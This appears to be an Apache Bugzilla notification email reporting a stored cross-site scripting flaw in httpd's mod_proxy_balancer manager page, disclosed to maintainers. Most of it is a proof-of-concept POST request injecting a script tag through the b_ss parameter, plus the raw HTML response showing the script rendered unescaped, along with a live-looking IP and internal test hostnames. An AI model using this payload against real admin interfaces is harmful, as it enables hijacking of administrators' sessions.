[Bug 59561] New: Stored Cross Site Scripting

bugzilla Tue, 17 May 2016 03:51:08 -0700

https://bz.apache.org/bugzilla/show_bug.cgi?id=59561


            Bug ID: 59561
           Summary: Stored Cross Site Scripting
           Product: Apache httpd-2
           Version: 2.4.20
          Hardware: All
                OS: All
            Status: NEW
          Severity: critical
          Priority: P2
         Component: mod_proxy_balancer
          Assignee: [email protected]
          Reporter: [email protected]

Parameter: b_ss

It is possible to include javascript to site.

POST /balancer/ HTTP/1.1
Host: 193.25.161.222:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64;
Trident/5.0)
Connection: close
Referer:
https://193.25.161.222:8443/balancer/?b=sgb_cluster&nonce=afb01cc6-57d6-402a-a118-ccc1ded6833e
Content-Type: application/x-www-form-urlencoded
Content-Length: 112

b_ss=ROUTEIDzwmgn<script>alert(1)<%2fscript>f1how&b=sgb_cluster&b_max=1&b_sforce=0&b_tmo=0&b_lbm=heartbeat&nonce=afb01cc6-57d6-402a-a118-ccc1ded6833e

Response:

HTTP/1.1 200 OK
Date: Tue, 17 May 2016 09:41:10 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 7648

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html><head><title>Balancer Manager</title>
<style type='text/css'>
table {
 border-width: 1px;
 border-spacing: 3px;
 border-style: solid;
 border-color: gray;
 border-collapse: collapse;
 background-color: white;
 text-align: center;
}
th {
 border-width: 1px;
 padding: 2px;
 border-style: dotted;
 border-color: gray;
 background-color: white;
 text-align: center;
}
td {
 border-width: 1px;
 padding: 2px;
 border-style: dotted;
 border-color: gray;
 background-color: white;
 text-align: center;
}
</style>
</head>
<body><h1>Load Balancer Manager for 193.25.161.222</h1>

<dl><dt>Server Version: Apache/2.4.6 (Red Hat Enterprise Linux)
OpenSSL/1.0.1e-fips mod_jk/1.2.40</dt>
<dt>Server Built: Dec  2 2014 08:09:42
</dt></dl>
<hr />
<h3>LoadBalancer Status for <a
href="/balancer/?b=sgb_cluster&nonce=afb01cc6-57d6-402a-a118-ccc1ded6833e">balancer://sgb_cluster</a>
[p17f73b00_sgb_cluster]</h3>


<table><tr><th>MaxMembers</th><th>StickySession</th><th>DisableFailover</th><th>Timeout</th><th>FailoverAttempts</th><th>Method</th><th>Path</th><th>Active</th></tr>
<tr><td>2 [2 Used]</td>
<td>ROUTEIDzwmgn<script>alert(1)</script>f1how<td>Off</td>
</td><td>0</td><td>1</td>
<td>heartbeat</td>
<td>/sgb/mobile-seitc/servlets</td>
<td>Yes</td>
</table>
<br />

<table><tr><th>Worker
URL</th><th>Route</th><th>RouteRedir</th><th>Factor</th><th>Set</th><th>Status</th><th>Elected</th><th>Busy</th><th>Load</th><th>To</th><th>From</th></tr>
<tr>
<td><a
href="/balancer/?b=sgb_cluster&w=https://polhceseitc01-test.polcard.com.pl:8443/mobile-seitc/servlets&nonce=afb01cc6-57d6-402a-a118-ccc1ded6833e";>https://polhceseitc01-test.polcard.com.pl:8443/mobile-seitc/servlets</a></td><td>sgb1</td><td></td><td>1</td><td>0</td><td>Init
Ok </td><td>0</td><td>0</td><td>1</td><td>  0 </td><td>  0 </td></tr>
<tr>
<td><a
href="/balancer/?b=sgb_cluster&w=https://polhceseitc02-test.polcard.com.pl:8443/mobile-seitc/servlets&nonce=afb01cc6-57d6-402a-a118-ccc1ded6833e";>https://polhceseitc02-test.polcard.com.pl:8443/mobile-seitc/servlets</a></td><td>sgb2</td><td>[email protected]</td><td>1</td><td>0</td><td>Init
Ok </td><td>0</td><td>0</td><td>1</td><td>  0 </td><td>  0 </td></tr>
</table>
<hr />
<h3>LoadBalancer Status for <a
href="/balancer/?b=rbp_cluster&nonce=cd3d7a62-1c66-45a7-bd12-a8eefdda4fa0">balancer://rbp_cluster</a>
[p17f73b00_rbp_cluster]</h3>


<table><tr><th>MaxMembers</th><th>StickySession</th><th>DisableFailover</th><th>Timeout</th><th>FailoverAttempts</th><th>Method</th><th>Path</th><th>Active</th></tr>
<tr><td>2 [2 Used]</td>
<td>ROUTEID<td>Off</td>
</td><td>0</td><td>1</td>
<td>byrequests</td>
<td>/rbp/mobile-seitc/servlets</td>
<td>Yes</td>
</table>
<br />

<table><tr><th>Worker
URL</th><th>Route</th><th>RouteRedir</th><th>Factor</th><th>Set</th><th>Status</th><th>Elected</th><th>Busy</th><th>Load</th><th>To</th><th>From</th></tr>
<tr>
<td><a
href="/balancer/?b=rbp_cluster&w=https://polhceseitc01-test.polcard.com.pl:8443/mobile-seitc/servlets&nonce=cd3d7a62-1c66-45a7-bd12-a8eefdda4fa0";>https://polhceseitc01-test.polcard.com.pl:8443/mobile-seitc/servlets</a></td><td>rbp1</td><td></td><td>1</td><td>0</td><td>Init
Ok </td><td>0</td><td>0</td><td>0</td><td>  0 </td><td>  0 </td></tr>
<tr>
<td><a
href="/balancer/?b=rbp_cluster&w=https://polhceseitc02-test.polcard.com.pl:8443/mobile-seitc/servlets&nonce=cd3d7a62-1c66-45a7-bd12-a8eefdda4fa0";>https://polhceseitc02-test.polcard.com.pl:8443/mobile-seitc/servlets</a></td><td>rbp2</td><td></td><td>1</td><td>0</td><td>Init
Ok </td><td>0</td><td>0</td><td>0</td><td>  0 </td><td>  0 </td></tr>
</table>
<hr />
<h3>LoadBalancer Status for <a
href="/balancer/?b=erb_cluster&nonce=595d4440-c227-41b5-8e0b-7376b32fba01">balancer://erb_cluster</a>
[p17f73b00_erb_cluster]</h3>


<table><tr><th>MaxMembers</th><th>StickySession</th><th>DisableFailover</th><th>Timeout</th><th>FailoverAttempts</th><th>Method</th><th>Path</th><th>Active</th></tr>
<tr><td>2 [2 Used]</td>
<td>ROUTEID<td>Off</td>
</td><td>0</td><td>1</td>
<td>byrequests</td>
<td>/erb/mobile-seitc/servlets</td>
<td>Yes</td>
</table>
<br />

<table><tr><th>Worker
URL</th><th>Route</th><th>RouteRedir</th><th>Factor</th><th>Set</th><th>Status</th><th>Elected</th><th>Busy</th><th>Load</th><th>To</th><th>From</th></tr>
<tr>
<td><a
href="/balancer/?b=erb_cluster&w=https://polhceseitc01-test.polcard.com.pl:8443/mobile-seitc/servlets&nonce=595d4440-c227-41b5-8e0b-7376b32fba01";>https://polhceseitc01-test.polcard.com.pl:8443/mobile-seitc/servlets</a></td><td>erb1</td><td></td><td>1</td><td>0</td><td>Init
Ok </td><td>1</td><td>0</td><td>0</td><td>1.5K</td><td> 20 </td></tr>
<tr>
<td><a
href="/balancer/?b=erb_cluster&w=https://polhceseitc02-test.polcard.com.pl:8443/mobile-seitc/servlets&nonce=595d4440-c227-41b5-8e0b-7376b32fba01";>https://polhceseitc02-test.polcard.com.pl:8443/mobile-seitc/servlets</a></td><td>erb2</td><td></td><td>1</td><td>0</td><td>Init
Ok </td><td>1</td><td>0</td><td>0</td><td>1.5K</td><td> 20 </td></tr>
</table>
<hr />
<h3>LoadBalancer Status for <a
href="/balancer/?b=get_cluster&nonce=fd098a63-6823-4136-92ea-a107dd82293a">balancer://get_cluster</a>
[p17f73b00_get_cluster]</h3>


<table><tr><th>MaxMembers</th><th>StickySession</th><th>DisableFailover</th><th>Timeout</th><th>FailoverAttempts</th><th>Method</th><th>Path</th><th>Active</th></tr>
<tr><td>2 [2 Used]</td>
<td>ROUTEID<td>Off</td>
</td><td>0</td><td>1</td>
<td>byrequests</td>
<td>/get/mobile-seitc/servlets</td>
<td>Yes</td>
</table>
<br />

<table><tr><th>Worker
URL</th><th>Route</th><th>RouteRedir</th><th>Factor</th><th>Set</th><th>Status</th><th>Elected</th><th>Busy</th><th>Load</th><th>To</th><th>From</th></tr>
<tr>
<td><a
href="/balancer/?b=get_cluster&w=https://polhceseitc01-test.polcard.com.pl:8443/mobile-seitc/servlets&nonce=fd098a63-6823-4136-92ea-a107dd82293a";>https://polhceseitc01-test.polcard.com.pl:8443/mobile-seitc/servlets</a></td><td>get1</td><td></td><td>1</td><td>0</td><td>Init
Ok </td><td>0</td><td>0</td><td>0</td><td>  0 </td><td>  0 </td></tr>
<tr>
<td><a
href="/balancer/?b=get_cluster&w=https://polhceseitc02-test.polcard.com.pl:8443/mobile-seitc/servlets&nonce=fd098a63-6823-4136-92ea-a107dd82293a";>https://polhceseitc02-test.polcard.com.pl:8443/mobile-seitc/servlets</a></td><td>get2</td><td></td><td>1</td><td>0</td><td>Init
Ok </td><td>0</td><td>0</td><td>0</td><td>  0 </td><td>  0 </td></tr>
</table>
<hr />
<h3>Edit balancer settings for balancer://sgb_cluster</h3>
<form method='POST' enctype='application/x-www-form-urlencoded'
action='https://193.25.161.222:8443/balancer/'>
<dl>
<table>
<tr><td>LBmethod:</td><td>
<select name='b_lbm' id='b_lbm'><option value='bytraffic'>bytraffic
<option value='heartbeat' selected >heartbeat
<option value='bybusyness'>bybusyness
<option value='byrequests'>byrequests
</select>
</td></tr>
<tr><td>Timeout:</td><td><input name='b_tmo' id='b_tmo' type=text
value='0'></td></tr>
<tr><td>Failover Attempts:</td><td><input name='b_max' id='b_max' type=text
value='1'></td></tr>
<tr><td>Disable Failover:</td><td>On <input name='b_sforce' id='b_sforce'
value='1' type=radio> <br/> Off <input name='b_sforce' id='b_sforce' value='0'
type=radio checked></td>
<tr><td>Sticky Session:</td><td><input name='b_ss' id='b_ss' size=64 type=text
value
='ROUTEIDzwmgn<script>alert(1)</script>f1how'>&nbsp;&nbsp;&nbsp;&nbsp;(Use '-'
to delete)</td></tr>
<tr><td colspan=2><input type=submit value='Submit'></td></tr>
</table>
<input type=hidden name='b' id='b' value='sgb_cluster'>
<input type=hidden name='nonce' id='nonce'
value='afb01cc6-57d6-402a-a118-ccc1ded6833e'>
</form>
<hr />
</body></html>

-- 
You are receiving this mail because:
You are the assignee for the bug.

---------------------------------------------------------------------
To unsubscribe, e-mail: [email protected]
For additional commands, e-mail: [email protected]

[Bug 59561] New: Stored Cross Site Scripting

Reply via email to